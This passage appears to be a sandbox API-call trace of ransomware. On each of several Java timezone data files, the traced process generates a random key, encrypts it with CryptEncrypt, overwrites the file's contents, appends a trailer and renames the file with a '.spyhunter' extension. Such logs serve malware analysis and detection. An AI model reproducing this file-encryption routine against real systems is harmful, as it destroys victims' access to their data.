lpNumberOfBytesRead=0x25cf71c*=0x4d, lpOverlapped=0x0) returned 1 [0126.503] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.503] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf71c*=0x4d, lpOverlapped=0x0) returned 1 [0126.503] GetProcessHeap () returned 0x2c0000 [0126.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.503] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.503] WriteFile (in: hFile=0x170, lpBuffer=0x25cf75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x25cf75c*, lpNumberOfBytesWritten=0x25cf71c*=0x4, lpOverlapped=0x0) returned 1 [0126.503] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf71c*=0x30, lpOverlapped=0x0) returned 1 [0126.503] CloseHandle (hObject=0x170) returned 1 [0126.503] GetProcessHeap () returned 0x2c0000 [0126.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.504] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.spyhunter") returned 67 [0126.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul.spyhunter")) returned 1 [0126.504] GetProcessHeap () returned 0x2c0000 [0126.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.504] GetProcessHeap () returned 0x2c0000 [0126.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.504] GetProcessHeap () returned 0x2c0000 [0126.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60600 | out: hHeap=0x2c0000) returned 1 [0126.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf758 | out: pbBuffer=0x25cf758) returned 1 [0126.505] GetProcessHeap () returned 0x2c0000 [0126.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf750*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf750*=0x30) returned 1 [0126.505] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.506] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui") returned 57 [0126.506] StrStrW (lpFirst="Bangui", lpSrch=".txt") returned 0x0 [0126.506] GetProcessHeap () returned 0x2c0000 [0126.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.506] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf714*=0x41, lpOverlapped=0x0) returned 1 [0126.507] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.507] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf714*=0x41, lpOverlapped=0x0) returned 1 [0126.507] GetProcessHeap () returned 0x2c0000 [0126.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.507] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.507] WriteFile (in: hFile=0x170, lpBuffer=0x25cf754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x25cf754*, lpNumberOfBytesWritten=0x25cf714*=0x4, lpOverlapped=0x0) returned 1 [0126.508] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf714*=0x30, lpOverlapped=0x0) returned 1 [0126.508] CloseHandle (hObject=0x170) returned 1 [0126.508] GetProcessHeap () returned 0x2c0000 [0126.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.508] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.spyhunter") returned 67 [0126.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui.spyhunter")) returned 1 [0126.509] GetProcessHeap () returned 0x2c0000 [0126.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.509] GetProcessHeap () returned 0x2c0000 [0126.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.509] GetProcessHeap () returned 0x2c0000 [0126.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60540 | out: hHeap=0x2c0000) returned 1 [0126.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf758 | out: pbBuffer=0x25cf758) returned 1 [0126.509] GetProcessHeap () returned 0x2c0000 [0126.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.509] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf750*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf750*=0x30) returned 1 [0126.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.509] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako") returned 57 [0126.510] StrStrW (lpFirst="Bamako", lpSrch=".txt") returned 0x0 [0126.510] GetProcessHeap () returned 0x2c0000 [0126.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.510] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf714*=0x55, lpOverlapped=0x0) returned 1 [0126.511] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.511] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf714*=0x55, lpOverlapped=0x0) returned 1 [0126.511] GetProcessHeap () returned 0x2c0000 [0126.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.511] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.511] WriteFile (in: hFile=0x170, lpBuffer=0x25cf754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x25cf754*, lpNumberOfBytesWritten=0x25cf714*=0x4, lpOverlapped=0x0) returned 1 [0126.511] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf714, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf714*=0x30, lpOverlapped=0x0) returned 1 [0126.511] CloseHandle (hObject=0x170) returned 1 [0126.511] GetProcessHeap () returned 0x2c0000 [0126.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.511] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.spyhunter") returned 67 [0126.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako.spyhunter")) returned 1 [0126.512] GetProcessHeap () returned 0x2c0000 [0126.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.512] GetProcessHeap () returned 0x2c0000 [0126.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.512] GetProcessHeap () returned 0x2c0000 [0126.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60480 | out: hHeap=0x2c0000) returned 1 [0126.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf750 | out: pbBuffer=0x25cf750) returned 1 [0126.512] GetProcessHeap () returned 0x2c0000 [0126.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.513] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf748*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf748*=0x30) returned 1 [0126.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.514] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara") returned 57 [0126.514] StrStrW (lpFirst="Asmara", lpSrch=".txt") returned 0x0 [0126.514] GetProcessHeap () returned 0x2c0000 [0126.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.514] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf70c*=0x41, lpOverlapped=0x0) returned 1 [0126.515] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.515] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf70c*=0x41, lpOverlapped=0x0) returned 1 [0126.515] GetProcessHeap () returned 0x2c0000 [0126.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.515] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.515] WriteFile (in: hFile=0x170, lpBuffer=0x25cf74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x25cf74c*, lpNumberOfBytesWritten=0x25cf70c*=0x4, lpOverlapped=0x0) returned 1 [0126.515] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf70c*=0x30, lpOverlapped=0x0) returned 1 [0126.515] CloseHandle (hObject=0x170) returned 1 [0126.515] GetProcessHeap () returned 0x2c0000 [0126.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.515] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.spyhunter") returned 67 [0126.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara.spyhunter")) returned 1 [0126.516] GetProcessHeap () returned 0x2c0000 [0126.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.516] GetProcessHeap () returned 0x2c0000 [0126.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.516] GetProcessHeap () returned 0x2c0000 [0126.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e603c0 | out: hHeap=0x2c0000) returned 1 [0126.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf750 | out: pbBuffer=0x25cf750) returned 1 [0126.516] GetProcessHeap () returned 0x2c0000 [0126.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf748*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf748*=0x30) returned 1 [0126.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.518] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers") returned 58 [0126.518] StrStrW (lpFirst="Algiers", lpSrch=".txt") returned 0x0 [0126.518] GetProcessHeap () returned 0x2c0000 [0126.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.518] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf70c*=0x14d, lpOverlapped=0x0) returned 1 [0126.519] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.519] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x14d, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf70c*=0x14d, lpOverlapped=0x0) returned 1 [0126.519] GetProcessHeap () returned 0x2c0000 [0126.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.519] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.519] WriteFile (in: hFile=0x170, lpBuffer=0x25cf74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x25cf74c*, lpNumberOfBytesWritten=0x25cf70c*=0x4, lpOverlapped=0x0) returned 1 [0126.519] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf70c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf70c*=0x30, lpOverlapped=0x0) returned 1 [0126.519] CloseHandle (hObject=0x170) returned 1 [0126.519] GetProcessHeap () returned 0x2c0000 [0126.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.520] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.spyhunter") returned 68 [0126.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers.spyhunter")) returned 1 [0126.520] GetProcessHeap () returned 0x2c0000 [0126.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.520] GetProcessHeap () returned 0x2c0000 [0126.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.520] GetProcessHeap () returned 0x2c0000 [0126.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60300 | out: hHeap=0x2c0000) returned 1 [0126.520] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf748 | out: pbBuffer=0x25cf748) returned 1 [0126.520] GetProcessHeap () returned 0x2c0000 [0126.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.521] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf740*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf740*=0x30) returned 1 [0126.521] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.521] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa") returned 62 [0126.521] StrStrW (lpFirst="Addis_Ababa", lpSrch=".txt") returned 0x0 [0126.521] GetProcessHeap () returned 0x2c0000 [0126.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.521] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf704*=0x41, lpOverlapped=0x0) returned 1 [0126.522] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.522] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf704*=0x41, lpOverlapped=0x0) returned 1 [0126.522] GetProcessHeap () returned 0x2c0000 [0126.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.522] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.522] WriteFile (in: hFile=0x170, lpBuffer=0x25cf744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x25cf744*, lpNumberOfBytesWritten=0x25cf704*=0x4, lpOverlapped=0x0) returned 1 [0126.522] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf704*=0x30, lpOverlapped=0x0) returned 1 [0126.522] CloseHandle (hObject=0x170) returned 1 [0126.522] GetProcessHeap () returned 0x2c0000 [0126.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.523] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.spyhunter") returned 72 [0126.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa.spyhunter")) returned 1 [0126.523] GetProcessHeap () returned 0x2c0000 [0126.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.523] GetProcessHeap () returned 0x2c0000 [0126.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.523] GetProcessHeap () returned 0x2c0000 [0126.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfc68 | out: hHeap=0x2c0000) returned 1 [0126.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf748 | out: pbBuffer=0x25cf748) returned 1 [0126.523] GetProcessHeap () returned 0x2c0000 [0126.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf740*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf740*=0x30) returned 1 [0126.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.524] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra") returned 56 [0126.524] StrStrW (lpFirst="Accra", lpSrch=".txt") returned 0x0 [0126.525] GetProcessHeap () returned 0x2c0000 [0126.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.525] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf704*=0xb5, lpOverlapped=0x0) returned 1 [0126.525] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.525] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb5, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf704*=0xb5, lpOverlapped=0x0) returned 1 [0126.526] GetProcessHeap () returned 0x2c0000 [0126.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.526] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.526] WriteFile (in: hFile=0x170, lpBuffer=0x25cf744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x25cf744*, lpNumberOfBytesWritten=0x25cf704*=0x4, lpOverlapped=0x0) returned 1 [0126.526] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf704, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf704*=0x30, lpOverlapped=0x0) returned 1 [0126.526] CloseHandle (hObject=0x170) returned 1 [0126.526] GetProcessHeap () returned 0x2c0000 [0126.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.526] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.spyhunter") returned 66 [0126.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra"), lpNewFileName="\\\\?\\C:\\Program Files 